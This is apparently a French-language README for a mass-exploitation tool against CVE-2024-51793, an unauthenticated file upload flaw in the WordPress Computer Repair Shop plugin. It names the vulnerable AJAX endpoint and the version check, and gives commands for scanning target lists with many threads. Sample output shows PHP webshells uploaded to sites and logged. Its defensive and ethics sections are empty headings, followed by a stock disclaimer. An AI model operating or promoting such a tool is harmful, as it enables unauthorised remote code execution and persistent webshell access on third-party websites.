
Exploite le téléchargement de fichiers arbitraire non authentifié CVE-2024-51793 dans le plugin WordPress Computer Repair Shop, scanne les listes de cibles, télécharge des webshells PHP et signale les sites vulnérables.
📋 Aperçu
CVE-2024-51793 est une vulnérabilité de téléchargement arbitraire de fichiers non authentifié dans le plugin WordPress Computer Repair Shop (versions antérieures à 3.8116). Cette vulnérabilité permet à des attaquants de télécharger des fichiers arbitraires, y compris des webshells PHP, sans authentification, conduisant à une exécution de code à distance sur les sites WordPress vulnérables.
🚨 Détails de la vulnérabilité
CVE ID : CVE-2024-51793
Type de vulnérabilité : Téléchargement arbitraire de fichiers non authentifié
Plugin affecté : Plugin WordPress Computer Repair Shop
Versions affectées : < 3.8116
Niveau de risque : Critique (Score CVSS : 9.8)
🔧 Détails techniques
La vulnérabilité réside dans le gestionnaire d'action wc_upload_file_ajax du plugin, qui ne valide pas correctement les types de fichiers et l'authentification des utilisateurs, permettant à des attaquants non authentifiés de télécharger des fichiers malveillants directement sur le serveur.
📦 Installation et prérequis
Prérequis
Python 3.6+
Paquets requis : requests
Installation
bash
git clone cd cve-2024-51793-exploit
pip install requests
pip install -r requirements.txt
🛠️ Guide d'utilisation
Utilisation de base
bash python3 cve_2024_51793_exploit.py -l targets.txt -t 50
Utilisation avancée
bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose
Arguments en ligne de commande
| Argument | Court | Description | Par défaut |
|---|---|---|---|
--list | -l | Chemin vers le fichier contenant les URL cibles (obligatoire) | - |
--threads | -t | Nombre de threads concurrents | 50 |
--output | -o | Répertoire de sortie pour les résultats | results |
Format du fichier d'entrée
Créez un fichier texte (targets.txt) avec une URL par ligne :
text example.com https://vulnerable-site.com http://192.168.1.100/wordpress test-site.org/blog
🔍 Fonctionnement
Validation de la cible
Le script vérifie d'abord si la cible exécute la version vulnérable du plugin en examinant :
text /wp-content/plugins/computer-repair-shop/readme.txt
Détection de version
Il vérifie que le plugin contient "CRM WordPress Plugin" et que la version est inférieure à 3.8116.
Exploitation
Si vulnérable, le script télécharge un webshell PHP via :
text POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax
Charge utile du webshell
Le webshell téléchargé fournit :
📊 Fichiers de sortie
L'outil génère deux fichiers de sortie principaux :
vulnerable_targets.txt - Liste des URL confirmées vulnérableswebshells.txt - Liste des URL de webshells téléchargés avec succès🎯 Exemple d'exécution
bash $ python3 cve_2024_51793_exploit.py -l targets.txt -t 30
╔══════════════════════════════════════════════════════════════╗
║ ║
║ CVE-2024-51793 Exploit Tool ║
║ Unauthenticated RCE in Computer Repair Shop WP Plugin ║
║ ║
╚══════════════════════════════════════════════════════════════╝
[ INFO ] Loaded 150 unique targets [ INFO ] Starting scan with 30 threads
[ SCANNING ] Checking: http://example.com/ [ VULNERABLE ] Target identified: http://example.com/ [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
[ SCANNING ] Checking: http://testsite.com/ [ NOT VULNERABLE ] Target: http://testsite.com/
[ COMPLETED ] Scan finished successfully
🛡️ Mesures défensives
Pour les propriétaires de sites web
Actions immédiates :
Mesures préventives :
Pour les chercheurs en sécurité
⚠️ Considérations légales et éthiques
🔄 Maintenance
Mises à jour
Vérifiez régulièrement :
Dépannage
Problèmes courants et solutions :
📞 Support
Pour les problèmes et améliorations :
📚 Références
Avertissement : Cet outil doit être utilisé uniquement pour la recherche en sécurité légitime et les tests d'intrusion autorisés. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.